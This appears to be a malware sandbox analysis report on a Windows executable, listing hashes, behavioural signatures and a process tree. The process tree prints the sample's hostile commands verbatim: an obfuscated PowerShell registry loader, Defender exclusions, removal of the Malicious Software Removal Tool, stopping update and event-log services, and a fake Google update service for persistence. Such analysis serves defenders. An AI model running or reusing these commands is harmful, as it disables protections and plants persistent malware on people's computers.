Analysis
-
max time kernel
151s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
21-11-2024 12:51
Static task
static1
Behavioral task
behavioral1
Sample
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe
Resource
win10v2004-20241007-en
General
-
Target
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe
-
Size
15.9MB
-
MD5
d3c16cede9b6e4ee304a0184328d313d
-
SHA1
bd82838a3cc343956ecce4d5051b510dd941de11
-
SHA256
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c
-
SHA512
284c38ba1a8ce4120120eb89a8e17bcbb6c3d18874c189d65812e767a111883813163ab614d5de802b5ee2fe774143a84017399508c24ac061029828d3046f6b
-
SSDEEP
393216:fwibRRlK6/C+1ZDpHKG1cVWNEtW5I+L11k2OEin:f7RllK+LlaaSW5zL1ypEin
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2024 created 420 2024 powershell.EXE winlogon.exe -
Processes:
powershell.EXEpowershell.exepowershell.exepid process 2024 powershell.EXE 2920 powershell.exe 2204 powershell.exe -
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 2 IoCs
Processes:
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exeupdater.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Executes dropped EXE 2 IoCs
Processes:
services.exeupdater.exepid process 464 services.exe 540 updater.exe -
Loads dropped DLL 1 IoCs
Processes:
services.exepid process 464 services.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 2692 powercfg.exe 1064 powercfg.exe 2304 powercfg.exe 2812 powercfg.exe 2864 powercfg.exe 2912 powercfg.exe 2820 powercfg.exe 2840 powercfg.exe -
Drops file in System32 directory 7 IoCs
Processes:
svchost.exepowershell.exee4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exepowershell.EXEpowershell.exeupdater.exedescription ioc process File opened for modification C:\Windows\System32\Tasks\dialersvc64 svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe updater.exe File created C:\Windows\System32\Tasks\dialersvc64 svchost.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exepowershell.EXEupdater.exedescription pid process target process PID 2792 set thread context of 1172 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 2024 set thread context of 2096 2024 powershell.EXE dllhost.exe PID 540 set thread context of 2936 540 updater.exe dialer.exe PID 540 set thread context of 2408 540 updater.exe dialer.exe PID 540 set thread context of 2724 540 updater.exe dialer.exe -
Drops file in Windows directory 2 IoCs
Processes:
wusa.exewusa.exedescription ioc process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 3032 sc.exe 2924 sc.exe 2712 sc.exe 2224 sc.exe 2368 sc.exe 2772 sc.exe 1580 sc.exe 3064 sc.exe 2376 sc.exe 2536 sc.exe 3048 sc.exe 836 sc.exe 3012 sc.exe 1516 sc.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 10ba943c143cdb01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exepowershell.exeupdater.exepowershell.EXEpowershell.exedllhost.exepid process 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 2920 powershell.exe 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe 540 updater.exe 2024 powershell.EXE 540 updater.exe 2204 powershell.exe 2024 powershell.EXE 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 540 updater.exe 540 updater.exe 540 updater.exe 540 updater.exe 540 updater.exe 540 updater.exe 540 updater.exe 540 updater.exe 540 updater.exe 540 updater.exe 540 updater.exe 540 updater.exe 540 updater.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe 2096 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.EXEpowershell.exedllhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 2920 powershell.exe Token: SeShutdownPrivilege 2304 powercfg.exe Token: SeShutdownPrivilege 2692 powercfg.exe Token: SeShutdownPrivilege 1064 powercfg.exe Token: SeShutdownPrivilege 2812 powercfg.exe Token: SeDebugPrivilege 2024 powershell.EXE Token: SeDebugPrivilege 2204 powershell.exe Token: SeDebugPrivilege 2024 powershell.EXE Token: SeDebugPrivilege 2096 dllhost.exe Token: SeShutdownPrivilege 2864 powercfg.exe Token: SeShutdownPrivilege 2820 powercfg.exe Token: SeShutdownPrivilege 2840 powercfg.exe Token: SeShutdownPrivilege 2912 powercfg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exee4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exetaskeng.exepowershell.EXEdllhost.execmd.exeupdater.exedescription pid process target process PID 2740 wrote to memory of 2880 2740 cmd.exe wusa.exe PID 2740 wrote to memory of 2880 2740 cmd.exe wusa.exe PID 2740 wrote to memory of 2880 2740 cmd.exe wusa.exe PID 2792 wrote to memory of 1172 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 2792 wrote to memory of 1172 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 2792 wrote to memory of 1172 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 2792 wrote to memory of 1172 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 2792 wrote to memory of 1172 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 2792 wrote to memory of 1172 2792 e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe dialer.exe PID 2172 wrote to memory of 2024 2172 taskeng.exe powershell.EXE PID 2172 wrote to memory of 2024 2172 taskeng.exe powershell.EXE PID 2172 wrote to memory of 2024 2172 taskeng.exe powershell.EXE PID 2024 wrote to memory of 2096 2024 powershell.EXE dllhost.exe PID 2024 wrote to memory of 2096 2024 powershell.EXE dllhost.exe PID 2024 wrote to memory of 2096 2024 powershell.EXE dllhost.exe PID 2024 wrote to memory of 2096 2024 powershell.EXE dllhost.exe PID 2024 wrote to memory of 2096 2024 powershell.EXE dllhost.exe PID 2024 wrote to memory of 2096 2024 powershell.EXE dllhost.exe PID 2024 wrote to memory of 2096 2024 powershell.EXE dllhost.exe PID 2024 wrote to memory of 2096 2024 powershell.EXE dllhost.exe PID 2024 wrote to memory of 2096 2024 powershell.EXE dllhost.exe PID 2096 wrote to memory of 420 2096 dllhost.exe winlogon.exe PID 2096 wrote to memory of 464 2096 dllhost.exe services.exe PID 2096 wrote to memory of 480 2096 dllhost.exe lsass.exe PID 2096 wrote to memory of 488 2096 dllhost.exe lsm.exe PID 2096 wrote to memory of 604 2096 dllhost.exe svchost.exe PID 2096 wrote to memory of 684 2096 dllhost.exe svchost.exe PID 2096 wrote to memory of 744 2096 dllhost.exe svchost.exe PID 572 wrote to memory of 1740 572 cmd.exe wusa.exe PID 572 wrote to memory of 1740 572 cmd.exe wusa.exe PID 572 wrote to memory of 1740 572 cmd.exe wusa.exe PID 2096 wrote to memory of 816 2096 dllhost.exe svchost.exe PID 2096 wrote to memory of 856 2096 dllhost.exe svchost.exe PID 540 wrote to memory of 2936 540 updater.exe dialer.exe PID 540 wrote to memory of 2936 540 updater.exe dialer.exe PID 540 wrote to memory of 2936 540 updater.exe dialer.exe PID 540 wrote to memory of 2936 540 updater.exe dialer.exe PID 540 wrote to memory of 2936 540 updater.exe dialer.exe PID 540 wrote to memory of 2936 540 updater.exe dialer.exe PID 540 wrote to memory of 2408 540 updater.exe dialer.exe PID 540 wrote to memory of 2408 540 updater.exe dialer.exe PID 540 wrote to memory of 2408 540 updater.exe dialer.exe PID 540 wrote to memory of 2408 540 updater.exe dialer.exe PID 540 wrote to memory of 2408 540 updater.exe dialer.exe PID 540 wrote to memory of 2408 540 updater.exe dialer.exe PID 540 wrote to memory of 2408 540 updater.exe dialer.exe PID 540 wrote to memory of 2408 540 updater.exe dialer.exe PID 540 wrote to memory of 2408 540 updater.exe dialer.exe PID 2096 wrote to memory of 992 2096 dllhost.exe svchost.exe PID 540 wrote to memory of 2724 540 updater.exe dialer.exe PID 540 wrote to memory of 2724 540 updater.exe dialer.exe PID 540 wrote to memory of 2724 540 updater.exe dialer.exe PID 540 wrote to memory of 2724 540 updater.exe dialer.exe PID 540 wrote to memory of 2724 540 updater.exe dialer.exe PID 2096 wrote to memory of 300 2096 dllhost.exe svchost.exe PID 2096 wrote to memory of 272 2096 dllhost.exe spoolsv.exe PID 2096 wrote to memory of 1032 2096 dllhost.exe svchost.exe PID 2096 wrote to memory of 1232 2096 dllhost.exe taskhost.exe PID 2096 wrote to memory of 1320 2096 dllhost.exe Dwm.exe PID 2096 wrote to memory of 1360 2096 dllhost.exe Explorer.EXE PID 2096 wrote to memory of 928 2096 dllhost.exe DllHost.exe PID 2096 wrote to memory of 1120 2096 dllhost.exe OSPPSVC.EXE PID 2096 wrote to memory of 1852 2096 dllhost.exe wmiprvse.exe PID 2096 wrote to memory of 1928 2096 dllhost.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:420
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a8e7d220-d731-43d6-b59f-2e8d7a766b8d}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2096
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:464 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:604
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:928
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:1852
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:684
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:744
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:816
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1320
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
PID:856 -
C:\Windows\system32\taskeng.exetaskeng.exe {78942DE8-F92E-4925-A929-01787ABE1DAB} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+''+[Char](84)+''+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'d'+''+[Char](105)+'al'+[Char](101)+''+'r'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2024
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:992
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:300
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:272
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1032
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1232
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1120
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1928
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:1924
-
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
- Drops file in Windows directory
PID:1740
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:2376
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2368
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:836
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:1516
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:3012
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:2936
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:2408
-
-
C:\Windows\system32\dialer.exedialer.exe3⤵PID:2724
-
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:480
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:488
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1360
-
C:\Users\Admin\AppData\Local\Temp\e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe"C:\Users\Admin\AppData\Local\Temp\e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
- Drops file in Windows directory
PID:2880
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:3032
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2924
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:2712
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:2536
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:2772
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1064
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:1172
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"3⤵
- Launches sc.exe
PID:1580
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"3⤵
- Launches sc.exe
PID:2224
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:3048
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"3⤵
- Launches sc.exe
PID:3064
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "276249942-906157870-9717880801187914802-2983865901610298675-20619947481413042431"1⤵PID:2332
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD56cec478a4e3dce19669074148faab1a2
SHA1c4ce7b8357c6a81319bf2e9488ef722cf96a2070
SHA256978705023f02be044a1d210c4a833970442fa72ac5809f649df992843e85277d
SHA512395c448feaf7c22edfb348d1f2a2b20fba5e6bf757a9cf486528be2f086e1a31575e036f2a1141e06289bf42bee55acdc34f7ce449deaf697ea7cbd6bc92dd4f
-
Filesize
3KB
MD54f9d9c2ae7b134963b4be3f67aeab8cb
SHA191a63a9655786a0267010aaa811135033084561b
SHA256a1d4e2e3c808b03bd4e21eb57d93576bfffd9be422587a61d3e67abb67806d2f
SHA51207fb8e1ddbc809803987d1ef6df97ca137ba18a13eccca1bf9a1e5b32b41da181c34045e1b63319d502ecdc95f038e84e01b7af03cb38efd53b6a949c82c9edd
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
15.9MB
MD5d3c16cede9b6e4ee304a0184328d313d
SHA1bd82838a3cc343956ecce4d5051b510dd941de11
SHA256e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c
SHA512284c38ba1a8ce4120120eb89a8e17bcbb6c3d18874c189d65812e767a111883813163ab614d5de802b5ee2fe774143a84017399508c24ac061029828d3046f6b